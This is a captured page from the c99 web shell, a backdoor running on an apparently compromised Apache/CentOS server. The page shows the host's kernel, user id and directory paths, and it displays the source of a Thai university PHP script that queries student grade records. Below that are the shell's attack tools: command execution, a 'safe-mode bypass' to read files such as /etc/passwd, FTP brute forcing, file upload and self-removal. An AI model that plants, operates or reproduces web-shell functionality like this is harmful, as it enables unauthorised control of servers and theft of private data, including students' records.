!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/xmigratex/   drwxr-xr-x
Free 52.29 GB of 127.8 GB (40.92%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     mof_ssm.php (6.28 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
"; //echo "tPassword = $tPassword
"; //echo "dbNo = $dbNo
"; // echo "dbNo = $dbNo
"; //echo '

เริ่มลบข้อมูล
'; $dbreg = $_POST["dbreg"]; $dbmoreg = $_POST["dbmoreg"]; $dbppc = $_POST["dbppc"]; $oums = $_POST["oums"]; $nums = $_POST["nums"]; $host = $_POST["localhost_s"]; $tUsername = $_POST["localhost_u"]; $tPassword = $_POST["localhost_p"]; $dbNo = $_POST["dbNo"]; $ln_reg = mysql_connect($host, $tUsername, $tPassword, true); if (!$ln_reg) { echo "$source_s"; die(' ไม่สามารถเชื่อมต่อฐานข้อมูลได้ ตรวจสอบชื่อ server, user และpassword ให้ถูกต้อง: ' . mysql_error()); echo ""; }else{ //echo "Connected $source_s successfully
"; } $db_info = mysql_select_db($dbreg, $ln_reg); //mysql_query("SET NAMES 'utf8'", $ln_info); if (!$db_info) { die ('ไม่สามารถเชื่อมต่อฐานข้อมูล'.$dbmoreg.'ได้: ' . mysql_error()); }else{ echo " เชื่อมต่อฐานข้อมูล $dbreg สำเร็จ
"; } echo "

"; ?> 3 // $query = "SELECT * FROM $dbreg.StudentStatus WHERE 1 ORDER BY studentId,acadYear,semester"; $query = "SELECT studentId ,acadYear ,semester ,studentStatus ,GPA ,creditAttempt ,creditSatisfy ,creditPoint ,GPAX ,sumCreditAttempt ,sumCreditSatisfy ,sumCreditPoint ,createDateTime ,createUserId ,updateDateTime ,updateUserId ,approveSpe ,approver ,refNo ,CONCAT(YEAR(approveDate)-543,'-',MONTH(approveDate),'-',DAY(approveDate)) AS approveDate ,passStatus , ( SELECT count( studentId ) +1 AS npass FROM $dbreg.`StudentStatus` ss2 WHERE ss.studentId = ss2.studentId AND ( ss2.acadYear < ss.acadYear OR ( ss2.acadYear = ss.acadYear AND ss2.semester < ss.semester ) ) AND ss2.passStatus IN ( 1, 2, 3 ) ) AS sy FROM $dbreg.`StudentStatus` ss WHERE 1 =1 ORDER BY studentId,acadYear,semester "; $result = mysql_query($query, $ln_reg); $num_rows = mysql_num_rows($result); ?> ssmStdId){ if($tr_class=='#e5e5e5') $tr_class = '#d3dce3'; else $tr_class = '#e5e5e5'; $stdId = $cur_row->ssmStdId; } $style = "style='background-color: $tr_class ;'"; ?> studentId == $cur_row->studentId && $next->acadYear > $cur_row->acadYear){ if($cur_row->studentStatus == 1 && $cur_row->passStatus < 4 ){ ?> studentStatus ==1 && $cur_row->passStatus >= 4 && $cur_row->GPAX < 1.95){ echo ""; }elseif($cur_row->studentStatus !=1 && $cur_row->passStatus < 4){ echo ""; }elseif($cur_row->studentStatus !=1 && $cur_row->passStatus >= 4 && $cur_row->GPAX < 1.95){ echo ""; }else{ echo ""; } }else{ echo '';} mysql_data_seek($result, $index); // หลังการ fetch result ต้องตั้งค่าให้แถวถัดไปเท่าเก่า } } /* if($index==2){ if (mysql_data_seek($result, $index)) { $next = mysql_fetch_object($result); echo '- '.$index; echo '  ,  '.$next->ssmStdId.''; echo '  ,  '.$next->ssmAcY; echo '  ,  '.$next->ssmTmId.'
'; mysql_data_seek($result, $index); }else{ echo 'end loop'; } } */ $index++; ?>
StudentStatus   ข้อมูล  แถว
ลำดับ รหัสนักศึกษา
studentId		 ปีการศึกษา
acadYear		 ภาคการศึกษา
semester		 สถานะนึกศึกษา
studentStatus		 ประมาลผล
passStatus		 ชั้นปี
sy		 -
GPAX		 -
PassStatus
> >studentId; ?> >acadYear; ?> >semester; ?> >studentStatus; ?> >passStatus; ?> >sy; ?> >GPAX; ?> > $cur_row->passStatus0$cur_row->passStatus

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0108 ]--